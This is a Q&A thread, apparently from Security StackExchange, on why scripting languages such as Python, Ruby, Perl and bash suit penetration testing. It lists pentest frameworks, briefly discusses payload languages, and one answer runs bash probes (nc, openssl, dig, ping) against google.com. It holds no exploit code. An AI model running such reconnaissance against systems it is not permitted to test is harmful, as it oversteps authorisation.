32

I know that scripting languages (Perl, Ruby, Python, javascript, and even Lua!!!) are most suitable for hacking and penetration testing.

My question is: What is it that makes those languages suitable? From what I know, they are slower than other languages, and operate at a higher abstraction level, which means they are too far from the hardware. The only reason I could think is because of their advanced string manipulation capabilities, but I believe that other languages have such capabilities.

AviD
  • 72,138
  • 22
  • 136
  • 218
NlightNFotis
  • 1,130
  • 1
  • 10
  • 18

8 Answers8

30

Languages are useful for doing things. What type of things it's suitable for completely depends on the type of language, the frameworks available for it, what OSes have interpreters / compilers for it, etc.

Let's look at the ones you've mentioned:

  • Perl
    • Scripting language
    • General purpose
    • Available on most *nix OSes since the '90s.
    • Great for quick hacks and short scripts.
  • Ruby
    • Scripting language
    • General purpose
    • Cross-platform
    • Object-oriented
    • Reflective (can see its own structure and code)
    • Good for dynamic frameworks
  • Python
    • Scripting language
    • General purpose
    • Cross-platform
    • Designed for clear and readable source code
    • Huge framework of libraries
  • JavaScript
    • Scripting language
    • Web-based
    • Cross-platform (available on every major browser)

So what makes these particularly good for pentesting? Well, most pentesting involves writing up quick throw-away tools to do a specific job for a specific test. Writing such a tool in C or C++ every time you want to do a quick job is cumbersome and time-consuming. Furthermore, they tend to produce platform-specific binaries or source that requires platform-specific compilation, rather than cross-platform scripts that just run. Scripting languages give you the flexibility to produce such tools quickly and easily.

For example, Ruby and Python are popular for more complex tasks because they have comprehensive libraries, whereas Perl is popular for quick data processing hacks. JavaScript is commonly utilised as a simple browser-based language that everyone has access to. Other languages such as C tend to be used for more low-level tasks that interface with the OS.

Now, the other side of the coin is languages used as payloads. This is where the line gets blurred, because requirements are so varied. For attacking Windows boxes, any payload that has no dependencies outside of what the OS provides is useful. This might be C, C++, VBScript, x86 asm, C# / VB.NET (.NET 2.0 is on most machines these days), etc. For attacking Linux boxes you might use C, C++, bash scripts or Perl. Java is also common for cross-platform attacks.

At the end of the day, pick the language that you find best for the job!

Polynomial
  • 132,208
  • 43
  • 298
  • 379
  • All of the examples are OO languages, however, Perl is more bolted on that integrated IMHO. If you are going to include JS in the list I think a more fitting option would have been PHP as well. Lastly as much as I hate to say it Perl still has the largest amount of libraries out there. This will change but CPAN has been around a long time so its the nature of the beast. – dc5553 May 12 '13 at 08:54
  • You might also want to mention Perl's huge framework of libraries (cpan.org), and that it's just as available cross platform (cygwin and activeperl). – atk Nov 03 '13 at 12:27
  • Main problem I find with Perl libraries is that they're rarely "modern". You can easily find Python stuff for parsing pcap-ng formats, integrating with VLC, manipulating SVGs, etc., but it's usually harder to find well-documented, cleanly designed, and full-featured libraries for Perl that do that kind of thing. Perl is *awesome* at doing gritty manipulation of primitives, and integrating with nix / bash, but it falls a bit flat when doing more complex work. – Polynomial Nov 04 '13 at 21:21
16

Here is a great answer I found on a stack overflow question of similar context by @tqbf: (I copied this answer here, because I believe it gives valid reasons for which they may be prefered, so it might be useful to future readers)

You probably want Ruby, because it's the native language for Metasploit, which is the de facto standard open source penetration testing framework. Ruby's going to give you:

  • Metasploit's framework, opcode and shellcode databases

  • Metasploit's Ruby lorcon bindings for raw 802.11 work

  • Metasploit's KARMA bindings for 802.11 clientside redirection

  • Libcurl and net/http for web tool writing

  • EventMachine for web proxy and fuzzing work (or RFuzz, which extends the well-known Mongrel webserver)

  • Metasm for shellcode generation

  • Distorm for x86 disassembly

  • BinData for binary file format fuzzing.

Second place here goes to Python. There are more pentesting libraries available in Python than in Ruby (but not enough to offset Metasploit). Commercial tools tend to support Python as well --- if you're an Immunity CANVAS or CORE Impact customer, you want Python. Python gives you:

  • Twisted for network access

  • PaiMei for program tracing and programmable debugging

  • CANVAS and Impact support

  • Dornseif's firewire libraries for remote debugging

  • Ready integration with WinDbg for remote Windows kernel debugging (there's still no good answer in Ruby for kernel debugging, which is why I still occasionally use Python).

  • Peach Fuzzer and Sully for fuzzing

  • SpikeProxy for web penetration testing (also, OWASP Pantera).

Unsurprisingly, a lot of web work uses Java tools. The de facto standard web pentest tool is Burp Suite, which is a Java swing app. Both Ruby and Python have Java variants you can use to get access to tools like that. Also, both Ruby and Python offer:

  • Direct integration with libpcap for raw packet work

  • OpenSSL bindings for crypto

  • IDA Pro extensions

  • Mature (or at least reasonable) C foreign function interfaces for API access

  • WxWindows for UI work, and decent web stacks for web UIs

You're not going to go wrong with either language, though for mainstream pentest work, Metasploit probably edges out all the Python benefits, and at present, for x86 reversing work, Python's superior debugging interfaces edge out all the Ruby benefits.

Also: it's 2008. They're not "scripting languages". They're programming languages. ;)

NlightNFotis
  • 1,130
  • 1
  • 10
  • 18
  • 1
    +1 since largely the capability for re-use of existing frameworks is the single largest benefit. I can certainly write apps to pen-test in any language, but not-having to reinvent the wheel (and not having to compile) gives directly executed languages a bit of a benefit – iivel Sep 21 '12 at 16:12
  • @iivel ^^this and compiling is one thing. Debugging is another =) – NlightNFotis Sep 21 '12 at 16:13
  • I can't tell you how much I hate debugging PERL though ... at least the Eclipse PERL debugger is pretty good :) It is good for knocking something out quick - but like LISP; it just hurts my brain. – iivel Sep 21 '12 at 16:17
  • One huge reason I would choose Python is Scapy. Sure Metasploit runs on Ruby but thats no reason to make it the "hackers" scripting language of choice. – dc5553 May 12 '13 at 08:56
  • @dc5553 There are a number of frameworks in Python that are useful for hacking. [Hachoir](https://bitbucket.org/haypo/hachoir) is another very useful framework used to analyse file types. – NlightNFotis May 12 '13 at 13:11
  • Canvas is also written in Python :) – dc5553 May 12 '13 at 13:20
7

Libraries, Time to write Code, cross-platform compatibility are key here. I found that using Python I was able to come up with Proof-of-concept exploits in a very short amount of time with minimum lines of code. This is possible because of the extensive standard library and additional libraries that you can download as well. I believe that is python's greatest strength to be used for pentesting and hacking.

Ex. you need a string of 1000 characters / 1000 bytes long.

In python:

print "A"*1000

In C :

for(i=0;i<1000;i++)printf("A");`

(Apart from all the includes mumbo jumbo and compiling it)

That is just a simple example. But as you can see the time taken for such a trivial task is far simpler in python.

The difference can be even more enhanced when you want to send http requests etc from your code. With urllib, httplib, etc for python, you can do it in a matter of 2 lines of code.

Lie Ryan
  • 31,089
  • 6
  • 68
  • 93
sudhacker
  • 4,260
  • 5
  • 23
  • 34
6

I think what defines a language suited for hacking, is:

  1. Usage of the language.
  2. Cross platform support.

Take an example of Java. It runs on all platforms, and is installed on a lot of system. This ensures a fairly high probability that the hackers code can run, and the language is installed on the system he targets.

The community of given highly used programming language, also occasionally finds vulnerabilities in the language, which allowed hackers to target that vulnerability, and have a very high change of hitting it, due to the high distribution of the language.

Kao
  • 242
  • 2
  • 10
6

I have zero knowledge in these fields, but the mentioned programming languages all enable rapid programming, i.e. one could try out a much larger number of different ideas in a given time frame than with the more runtime-efficient but inefficient for programming (and debugging) programming languages like C etc. That might be a point.

Mok-Kong Shen
  • 1,199
  • 1
  • 10
  • 14
6

Some good answers already to this one but I'll provide another perspective. One reason that scripting languages tend to be used for hacking is that they optimize for speed (and ease) of development which is likely to be a key factor.

As an example, for penetration testing scripting I use ruby. It has a number of good libraries for things like HTTP which mean I don't have to worry about low level details and writing a quick script is very fast as there's little "formality" required in a ruby script (e.g. method/variable declarations) when compared with languages like Java.

One of the downsides of these languages can be that they are slower at run-time, but for a lot of hacking work that's not an issue, speed of development is more important.

Rory McCune
  • 60,923
  • 14
  • 136
  • 217
3

My two cents:

Run (or other ) first!!

The quickness of the language doesn't matter when you are in full brainstorm!

One of the most usefull and powerfull language for this kind of operation seem to be forgotten in your question.

I would like to speak about as hacking environment. Yes take his name from the shell who may hold a lot of other things.

Under Un*x, you're primarily logged in a console, to be able to run other tools.

If it is one of the slower language:

$ time for ((i=1000000;i--;));do :;done
real    0m4.755s
user    0m4.628s
sys     0m0.124s

time perl -e 'map{1}(0..1000000)' 
real    0m0.199s
user    0m0.112s
sys     0m0.060s

$ time python -c 'for a in range(1000000): 1==1
real    0m0.119s
user    0m0.096s
sys     0m0.020s

Yes! More than 4 seconds for a 1 million step loop is very slow, but once you're logged in a command line console...

Main advantage to be considered:

  • history You could save/copy your history in order to be able to consult them later or to build a script
  • log By using tools like script and scriptreplay you could keep a very precise trace of all your job
  • Cut'n paste By using x-terminal or tools like screen, you could play with parallel tasks, on separated console, and share inputs/outputs between all of them.
  • fifo By merging simple but powerfull tools like nc | sed | ssh | python ...

Practical sample

you could start from:

$ mkdir /tmp/hackingGoogle
$ cd $_

than

$ nc google.com 80 <<<$'HEAD /fonts/ HTTP/1.0\r\n\r'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
...

From there, you may use all tool you want, like ping, traceroute, openssl, nmap, etc...

$ openssl s_client -connect google.com:443 -ign_eof \
      <<< $'HEAD / HTTP/1.0\r\n\r' 2>&1 | \
    openssl x509 -in /dev/stdin -out certfile
$ openssl x509 -in certfile -noout -fingerprint
SHA1 Fingerprint=67:1B:98:92:48:86:FF:E1:C5:02:44:C5:9F:F3:96:78:08:F5:0A:45
$ openssl x509 -in certfile -noout -subject
subject= /C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.google.com

If you're interested about SSL, some more sample script

or...

$ wget https://www.google.com/fonts/
$ vi index.html
$ wget https://www.google.com/fonts/webfonts.nocache.js
$ smjs < <(sed < webfonts.nocache.js 's/Window....')
...

for playing with javascript...

Usefull environment for storing variables:

$ ip=();ANS=false;while read -a line;do if [[ "$line" = ";;" ]];then [[ 
   "${line[1]}" = "ANSWER" ]] && ANS=true || ANS=false; fi ; $ANS && [[
   "${line[2]}" == "IN" ]] && ip+=(${line[4]});done < <(dig www.google.com)
$ printf "%s\n" ${ip[@]}
173.194.116.51
173.194.116.52
173.194.116.48
173.194.116.49
173.194.116.50

Depending on what you're searching for, you could use widely all your tool in all combination.

$ grep ^64 < <(for host in ${ip[@]};do ping -c2 $host&done;wait)|sort -t. -nk4
64 bytes from 173.194.113.112: icmp_req=1 ttl=54 time=45.4 ms
64 bytes from 173.194.113.112: icmp_req=2 ttl=54 time=47.8 ms
64 bytes from 173.194.113.113: icmp_req=1 ttl=54 time=41.4 ms
64 bytes from 173.194.113.113: icmp_req=2 ttl=54 time=40.2 ms
64 bytes from 173.194.113.114: icmp_req=1 ttl=54 time=43.1 ms
64 bytes from 173.194.113.114: icmp_req=2 ttl=54 time=39.0 ms
64 bytes from 173.194.113.115: icmp_req=1 ttl=54 time=47.0 ms
64 bytes from 173.194.113.115: icmp_req=2 ttl=54 time=42.1 ms
64 bytes from 173.194.113.116: icmp_req=1 ttl=54 time=43.9 ms
64 bytes from 173.194.113.116: icmp_req=2 ttl=54 time=39.0 ms

This could by re-written:

Mini script from there:

With this, you will make two ping, parallelized (this will normaly take only 1 seconds) on ~5 hosts:

ip=()
ANS=false
while read -a line;do
    if [[ "$line" = ";;" ]] ;then
        [[ "${line[1]}" = "ANSWER" ]] && ANS=true || ANS=false
    fi
    $ANS && [[ "${line[2]}" == "IN" ]] &&
        ip+=(${line[4]})
  done < <(dig www.google.com)
grep ^64 < <(
    for host in ${ip[@]};do
        ping -c2 $host &
    done
    wait
  ) |
  sort -t. -nk4

Other (more efficient) languages

Once the goal is fixed, after a lot of brainf@#@ing, common hacker will run his prefered editor and store his exploit as a script to automate next run.

The choice of the language used will depend mainly on the hacker's preferences. (If not required by his boss.)

And before reinventing wheel...

There is already a lot of tool dedicated to pentesting, scanning, research and analyse. If you use you could have a look on Debian Forensics Environment...

Anyway, the best environnment for testing and logging each step from this kind of job is a ( like ;-)

  • Bash is a scripting language, but what you are describing here is more stringing tools together than actual scripting. – Luc Jul 19 '14 at 20:06
  • @Luc: [tag:bash] is a *scripting language* but it's also a powerfull *user environment*. You could make a lot of succesives tries against your goal, than finaly dump the history to your [prefered editor](http://www.gnu.org/software/emacs/) ...to begin your work/script. You could even quickly edit temporary scripts, use *myFunc() { ...; }* on command line, create immediate loops, and so on... – F. Hauri - Give Up GitHub Jul 19 '14 at 22:14
  • Sorry for my english... Edit welcome! – F. Hauri - Give Up GitHub Jul 07 '18 at 07:29
  • Bash is an OS shell with support for scripting, but not really a full-featured scripting language. Note also that, while bash itself is really, really slow, dash and zsh are a good bit faster (but still not as fast as something like Python that uses JIT). – forest Jul 08 '18 at 02:53
  • @forest Yes, but hacking is a kind of brainstorming... Quickness of interpretter does'nt matter, while you are thinking... – F. Hauri - Give Up GitHub Jul 08 '18 at 06:02
  • @F.Hauri That entirely depends on what you are doing in the shell. Plenty of times, you'll need to do something that can be very slow. I've had times where I've waited for a bash command to complete because it was inefficient. – forest Jul 08 '18 at 11:48
-6
#include <stdio.h>
int main()
{
int i, list[1000];
for (i=0;i<1000;i++)
    {
    list[i] = 'A';
    }
return 0;
}

I don't see any mumbo jumbo here. In fact this is not that much longer than a full python program to do the same. Some loops are shorter in C than they could ever be with python, especially when in C you can use pointers which considerably give much more power and shorten the code to between 10 and 70 percent of the python equivalent. Of course normally C code is longer cause thats just the nature of more powerful languages.

Anyway hacking is done in C the best. forget anything else just go C.

Adi
  • 43,808
  • 16
  • 135
  • 167
  • 2
    -1 The whole point under discussion here is the the capability of a language to produce quick and easily code for performing one particular task, the script should be platform independent and it should have access to a large set of libraries useful for hacking. When was the last time you wrote a network protocol fuzzer in C? Compare that to a 5 line python program calling Scapy. – void_in Nov 03 '13 at 09:26